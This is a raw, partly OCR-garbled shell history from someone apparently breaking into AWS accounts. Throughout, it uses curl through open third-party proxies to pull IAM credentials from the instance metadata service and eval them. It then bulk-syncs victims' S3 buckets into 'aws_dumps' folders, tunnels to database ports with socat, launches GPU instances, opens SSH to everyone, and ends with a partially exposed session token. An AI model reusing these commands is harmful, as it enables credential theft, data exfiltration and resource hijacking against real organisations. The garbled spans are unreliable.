4664 aws ec2 create-key-pair --region us-east-1 --key-name default
4711 curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               | awssession.sh
      aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
4719
                   /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir='
4729
      mkdir aws dumps
4730 sudo mv
                        /mnt/export/aws dumps
4731 sudo mv
                     /mnt/export/aws dumps
4732 sudo mv
                             /mnt/export/aws dumps
                                 /mnt/export/aws dumps
4733
      sudo mv
4734
                      /mnt/export/aws dumps
      mν
4735
      sudo omv
                            /mnt/export/aws dumps
4736 sudo mv
                          /mnt/export/aws dumps
4737
               /mnt/export/aws dumps
      ΜV
                    /mnt/export/aws dumps
4738 sudo mv
                      /mnt/export/aws dumps
4740
      mν
4741 sudo mv
                            nnt/export/aws dumps
4742 sudo mv
                             /mnt/export/aws dumps
4743 sudo mv
                                 /mnt/export/aws dumps
4744 sudo mv
                          /mnt/export/aws dumps
                             /mnt/export/aws_dumps
4745 sudo mv
4746 sudo mv
                             /mnt/export/aws dumps
4747 sudo mv
                        /mnt/export/aws dumps
                       /mnt/export/aws dumps
4748 sudo mv
4749
      sudo mv
                          /mnt/export/aws dumps
4750
                    /mnt/export/aws dumps/webrole2 s3
      ΜV
                              /mnt/export/aws_dumps/infobloxcto
4751
      mν
                   /mnt/export/aws dumps
4752
      mν
4753
                                     /mnt/export/aws dumps
      mν
                                         /mnt/export/aws_dumps
4754 sudo mv
      aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
4759
ami-
                0e791 --associate-public-ip-address --security-group-id sg-
                                                                               ∂db7
--instance-initiated-shutdown-behavior terminate --key-name default2
4777 eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession`
4778 eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
```

```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
4780 eval `curl -Lsk --fail --proxy-insecure --proxy https://54.214.50.238:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           l awssession.sh`
4782 eval `curl -Lsk --fail --proxy-insecure --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                            awsession.sh`
4788 tree
4814 eval `curl -Lsk --fail --proxy-insecure --proxy http://52.0.198.32:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
4815 aws sts curl -Lsk --fail --proxy-insecure --proxy http://52.0.198.32:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
4819 eval `curl -Lsk --fail --proxy-insecure --proxy https://52.0.198.32:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                        | awssession.sh`
4820 aws ec2 describe-security-groups
4828 eval `curl -Lsk --fail --proxy-insecure --proxy https://52.208.97.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
                                                                                            /{}"' \;
4829 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"
4850 cd awsconfig
4862 eval `curl -Lsk --fail --proxy-insecure --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           | awssession.sh`
                                                                                                  /{}"'
4863 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
\; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
4879 eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           | awsession.sh`
4880 eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           l awssession.sh`
4881 eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
4884 eval `curl -Lsk --fail --proxy-insecure --proxy https://34.201.163.169:443
                                                                                 awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials/
4885 eval `curl -Lsk --fail --proxy-insecure --proxy https://54.164.114.241:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                         awssession.sh`
4886 aws ec2 describe-instaces --region us-eat-1
4887 aws ec2 describe-instaces --region us-east-1
4890 aws ec2 describe-instances --region us-east-1 >
4891 aws ec2 describe-instances --region us-west-2 >
```

```
4894 aws sts assume-role --role-arn "arn:aws:iam::
                                                            6483:instance-profile/
4895 aws sts assume-role --role-arn "arn:aws:iam::
                                                            6483:instance-profile/
--role-session-name
4896 aws sts assume-role --role-arn "arn:aws:iam::
                                                           6483:instance-profile/
--role-session-name
4897 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-
                                                                                                      90d3
--associate-public-ip-address
4898 aws ec2 run-instances --region us-east-1 --instance-type t3.micro --count 1 --image-id ami-
                                                                                                     90d3
--associate-public-ip-address
4931 grep -ri seattle ~/aws scan/capitol one inclusion list
4932 grep -ri seattle . > ~/aws_scan/capitol_one_inclusion_list
4933 less ~/aws_scan/capitol_one_inclusion list
4934 nano ~/aws scan/id
4977 aws describe-instances --region ap-southeast-2
4987 aws describe-instances
4988 aws ec2 describe-instances --region ap-southeast-2
4989 aws ec2 terminate-instances --instance-ids i-
                                                                 537e
4990 aws ec2 terminate-instances --instance-ids i-
                                                                 537e --region ap-southeast-2
5011 aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --keyname default3 --count 1
                  90d3 --associate-public-ip-address
--image-id ami-
5012 aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --key-name default3 --count 1
                  90d3 --associate-public-ip-address
--image-id ami-
5013 aws ec2 run-instances --region us-west-2 --instance-type a1.4xlarge --key-name default3 --count 1
--image-id ami-
                           ce49 --associate-public-ip-address
5014 cd aws describe-instances --region us-west-2
5015 aws ec2 describe-security-groups --group-ids sg-
                                                          bdac
5016 aws ec2 describe-security-groups --group-ids sg-
                                                          bdac --region us-west-2
5017 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  bdac --protocol tcp --port 22 --cidr
0.0.0.0/0 -- region us-west-2
5018 cd /home/erratic/aws scan
5020 eval `curl -Lsk --fail --proxy-insecure --proxy https://52.50.114.108:443
                                                                                          awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials/
5022 eval `curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/ | awssession.sh`
      aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
 5024
                           {}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir='
5026 find . -name "*
5028 cp
                        zip tmp
5029 unzip
                          .zip
```

```
5038 nslookup
5039 curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://
5040 curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://
                                                        -VVV
 5041 socat TCP-L:6000, reuseaddr, fork
                                                                      3306,proxyport=443,retry=10 2>
PROXY:35.168.232.110:
/dev/null &
 5043 socat TCP-L:6001, reuseaddr, fork
PROXY:localhost:
                                                                 3306,proxyport=6000,retry=10 &
 5052 socat TCP-L:6001, reuseaddr, fork
PROXY:localhost:
                                                                :5432,proxyport=6000,retry=10 &
 5079 eval `curl -Lsk --fail --proxy-insecure --proxy https://35.168.232.110:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5082 eval `curl -Lsk --fail --proxy-insecure --proxy http://3.120.251.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh `
5085 val `curl -Lsk --fail --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awssession.sh`
5086 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='"
                   /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
5087 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                 awssession.sh`
5094 cd /home/erratic/aws scan/metadata
5190 mv ../try create keypair.sh ../aquire aws info.sh
 5196 aws ec2 describe-regions
5199 aws ec2 describe-regions | jq -r '.Regions | .[] | .RegionName'
 5204 man aws
5209 grep -r ami-id | sed 's/:ami-id//g' | sed 's/.*:443/https\:\/\\0/g' | sed '/.*:443/!
s/.*/http:\/\\0/g' | parallel --tag curl --connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' ' | grep
"." | awk 'NF==2 {print $0}' | parallel --colsep ' ' .././aquire aws info.sh {1} {2}
5215 grep -r ami-id | sed 's/:ami-id//g' | sed 's/.*:443/https\:\/\\0/g' | sed '/.*:443/!
s/.*/http:\/\\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure
--proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' '
' | grep "." | awk 'NF==2 {print $0}' | parallel --colsep ' ' .././aquire aws info.sh {1} {2}
5220 aws iam
 5221 aws iam help
```

```
5262 nano ../aquire aws info.sh
 5263 nano ../aquire aws info.sh 0w
 5264 nano ../aquire aws info.sh -w
5265 grep -r ami-id | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed 's/.*:443/https\:\/\\0/g' | sed
'/.*:443/! s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail
--proxy-insecure --proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e
'"\n"' | tr '\t' ' ' | sed -e 's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' '
.././aguire aws info.sh {1} {2}
5274 cat mega metadata.txt | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed 's/.*:443/https\:\/\/\0/g'
| sed '/.*:443/! s/.*/http:\/\\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail
--proxy-insecure --proxy {} http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e
'"\n"' | tr '\t' ' | sed -e 's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}' | parallel --colsep ' '
.././aguire aws info.sh {1} {2}
5287 cat mega metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' | awk '{print $NF}' | grep -v Idea | sed
's/.metadata./:/g' | sort | uniq | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed
's/.*:443/https\:\/\/0/g' | sed '/.*:443/! s/.*/http:\/\/0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' ' ' | sed -e
's/<[^>]*>//g' | grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' ' .././aquire aws info.sh {1} {2}
5292 curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                  awssession.sh
 5293 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                  awssession.sh`
5294 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                       awssession.sh`
5295 eval `curl -Lsk --fail --proxy-insecure --proxy https://18.195.92.229:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                       awssession.sh`
5296 eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5297 eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                           | awssession.sh`
 5300 eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                    awssession.sh`
 5301 eval `curl -Lsk --fail --proxy-insecure --proxy https://18.196.151.118:443
                                                                                    | sed -e 's/<[^>]*>//g'
http://169.254.169.254/latest/meta-data/iam/security-credentials/
l awssession.sh`
5304 eval `curl -Lsk --fail --proxy-insecure --proxy http://3.88.201.19:81 http://localhost:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   | awssession.sh`
```

```
5311 eval `curl -Lsk --fail --proxy-insecure --proxy http://3.89.177.190:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
  | sed -e 's/<[^>]*>//g' | awssession.sh`
5312 eval `curl -Lsk --fail --proxy-insecure --proxy http://50.18.218.236:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                                        sed
-e 's/<[^>]*>//g' | awssession.sh`
5313 eval `curl -Lsk --fail --proxy-insecure --proxy http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                                l sed -e
's/<[^>]*>//g' | awssession.sh`
5315 curl
 5316 eval `curl -Lsk --fail --proxy-insecure --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                           sed -e
's/<[^>]*>//g' | awssession.sh`
5361 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                              awsession.sh`
5362 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
5364 eval `curl -Lsk --fail --proxy-insecure --proxy https://63.34.191.165:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                   awssession.sh`
5367 eval `curl -Lsk --fail --proxy-insecure --proxy http://54.94.134.172:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
5369 mv
                   /mnt/export/aws dumps
                   /mnt/export/aws dumps/
 5370 mv
5371 sudo mv
                        /mnt/export/aws dumps/
                      /mnt/export/aws dumps/
 5372 mv
                       /mnt/export/aws dumps/
 5373 mv
                          | /mnt/export/aws dumps/
 5374 Suao IIIV
                          /mnt/export/aws dumps/
5375 sudo mv
5376 sudo mv
                      /mnt/export/aws dumps
                         /mnt/export/aws dumps/
5377 sudo mv
 5378
              /export/aws dumps
 5386 cat
 5414
       aws --profile
                         describe-instances
      aws --profile
                             lescribe-instances
 5415
      aws --profile
                              describe-instances
 5416
```

```
5417 aws --profile
                              describe-instances --region eu-west-1
5418 aws --profile
                              describe-instances --region eu-west-1\n
5437 aws --profile
                                ec2 describe-instances --region us-west-1
5446 aws --profile
                                list-templates
5447 aws --profile
                                ses list-templates
5448 aws --profile
                                ses list-templates --region us-east-1
5515 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awssession.sh`
5516 aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
.InstanceType'
5517 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge _-count 1 --image-id
ami:
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
      aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 2 --image-id
ami:
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                706e
--instance-initiated-shutdown-behavior terminate --key-name default
5519 aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5520 aws ec2 run-instances --region eu-west-1 --instance-type p2.16xlarge --count 1 --image-id
ami-
                 la80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5521 aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 3 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                706e
--instance-initiated-shutdown-behavior terminate --key-name default
5522 aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5523 aws ec2 run-instances --region eu-west-1 --instance-type p2.8xlarge --count 1 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5524 aws ec2 run-instances --region eu-west-1 --instance-type p2.2xlarge --count 1 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                706e
--instance-initiated-shutdown-behavior terminate --key-name default
5525 aws ec2 run-instances --region eu-west-1 --instance-type p2.xlarge --count 1 --image-id
ami
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                706e
--instance-initiated-shutdown-behavior terminate --key-name default
5526 aws ec2 run-instances --region eu-west-1 --instance-type p3.xlarge --count 1 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                706e
```

```
--instance-initiated-shutdown-behavior terminate --kev-name default
5536 aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg
ami
                                                                                706e
--instance-initiated-shutdown-behavior terminate --key-name default
5537 aws ec2 run-instances --region eu-west-1 --instance-type g3.16xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
ami.
--instance-initiated-shutdown-behavior terminate --key-name default
5538 aws ec2 run-instances --region eu-west-1 --instance-type g3.8xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5539 aws ec2 run-instances --region eu-west-1 --instance-type g3.2xlarge --count 2 --image-id
                4a80 --associate-public-ip-address --security-group-ids sg
ami
--instance-initiated-shutdown-behavior terminate --key-name default
5540 aws ec2 run-instances --region eu-west-1 --instance-type g3.4xlarge --count 2 --image-id
ami-
                 1a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5541 aws ec2 run-instances --region eu-west-1 --instance-type g3s.xlarge --count 2 --image-id
ami
                 1a80 --associate-public-ip-address --security-group-ids sg
--instance-initiated-shutdown-behavior terminate --key-name default
5542 aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
[.InstanceType, .PublicIpAddress]'
 5560 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.57.176.179:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                            awssession.sh`
5561 aws ec2 desrcribe-instances
5562 aws ec2 descrcribe-instances
5564 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.220.55:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           awssession.sh`
 5678 mkdir awstmp
5679 cat 11-3-19 11-3-19.443.log 11-3-19.non443.log 14-03.19 14-03-19.non443.log 22.03.19 23-03-19.ami-id
26.03.19 27.03.19 28.03.19 30.03.19 3-20-19 3-20-19.ssl 7-03-19 7-03-19.443.log 7-03-19.non443.log
9-03-19.443.log 9-3-19 9-3-19.non443.log | grep -B 4 Arn | grep curl | tr -d '}' | sed -e 's/<[^>]*>//g' |
parallel --tag {} -o awstmp/{}.log
5680 cd awstmp
 5704 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.10.40.107:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5706 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.50.114.108:443
```

```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                           awssession.sh`
5707 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.195.92.229:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,
                                                                                        awssession.sh`
5709 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.32.127.100:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5750 cp /home/erratic/aws scan/new all.xz .
 5761
 5762 curl
5763 curl
 5768 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.10.40.107:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials
5773 aws --profile
                                --region us-east-1 ec2 describe-instances
5774 cat
                                        json
 5860 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.57.176.179:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
5871 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                    '{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir=''
5890 cat /home/erratic/aws scan/mega metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' | awk '{print
NF' \mid grep - v \mid dea \mid sed 's/.metadata./:/g' \mid sort \mid uniq \mid sed 's/:ami-id//g' \mid sed -e 's/<[^>]*>//g'
sed 's/.*:443/https\:\/\\0/g' | sed '/.*:443/! s/.*/http:\/\\0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/info
5891 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
5892 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
```

```
5893 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.33.58.7:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
5894 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5896 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://63.34.213.125:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
| awssession.sh`
5897 aws ec2 s3api list-buckets
5900 if [ "$AWS DEFAULT REGION" = "eu-west-1" ]; then aws configure set s3.signature version s3v4; fi
                                                                     .sh ~/\n
 5901 aws s3 cp
 5905 aws s3 sync
 5914 cat awslogs.conf
5915 cat awslogs.conf | less
5946 cat /home/erratic/aws_scan/mega_metadata.txt | sed -e 's/<[^>]*>//g' | tr '/' ' | awk '{print
$NF}' | grep -v Idea | sed 's/.metadata./:/g' | sort | uniq | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g'
sed 's/.*:443/https\:\/\\0/g' | sed '/.*:443/! s/.*/http:\/\\0/g' | parallel --tag curl --retry 2
--connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
http://169.254.169.254/latest/meta-data/iam/info | less
5947 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.193.62.96:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 5949 aws ec2 create-key-pair --region us-west-2
 5952 aws ec2 describe-security-groups --region us-west-2
 5953 aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                               4980
--instance-initiated-shutdown-behavior terminate --key-name default
5954 aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
                                                                                13f8
--instance-initiated-shutdown-behavior terminate --key-name default
5956 aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
ami
                                                                                ad64
--instance-initiated-shutdown-behavior terminate --key-name default
 5957 aws ec2 describe-network-
5958 aws ec2 describe-network-
                                    --region us-west-2
 5959 aws ec2 run-instances --region eu-west-1 --instance-type p3dn.24xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
ami-
                                                                                ad64
```

```
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
                                                                                           761f
 5960 aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
ami
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
 5961 aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
5962 aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-
                   8109 --associate-public-ip-address --instance-initiated-shutdown-behavior terminate
--kev-name default
      aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
                   8109 --associate-public-ip-address --security-group-ids sg-
\tami
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
       aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
                                                                                           22da
5965 <u>aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id</u>
\tami-
                   3109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-(
                                                                                           ee04
5966 aws ec2 run-instances --region us-west-2 --instance-type p3dn.24xlarge --count 2 --image-id
\tami-
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-( ee04
5967 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
\tami
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --kev-name default --subnet-id subnet-
 5968 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
\tami-
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
                                                                                           ee04
5969 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
\tami-
                   8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
5970 aws ec2 describe-instances --region eu-west-1 | jq '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress' --region us-west-2
5971 aws ec2 describe-instances --region eu-west-1 --region us-west-2 | jq '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
5975 aws ec2 authorize-security-group-ingress --group-id sg- 43f8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
5992 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                          "' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir='
```

```
6021 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.220.54.110:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                       awssession.sh`
6032 tar -cvf ~/aws.tar ~/.aws
6034
      mν
             .sh ~/aws scan
6035 cd ~/aws scan
6042 nano ~/.aws/
                                             ison
6052 eval `curl -vvv --tail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.220.54.110:8181
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/
awssession.sh`
6068 eval `echo -e '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-06T01:24:59Z",\n
         ",\n "AccessKeyId" : "
                                               3RWD",\n "SecretAccessKey" :
                                               Token":
                                     gebe", \n
"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEOCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEOY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7//////8BEAAaDDkwOTQzNTQ1NzIwMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
Dy+FachI3kASvpwyuF4EjNdk/Qcq83Ae7Wsum8ueYaKcw87jZSAea+8gt2IyHAzb6WnQwCw+AnupLuePqfPEIYYM7A17DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047JQlP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
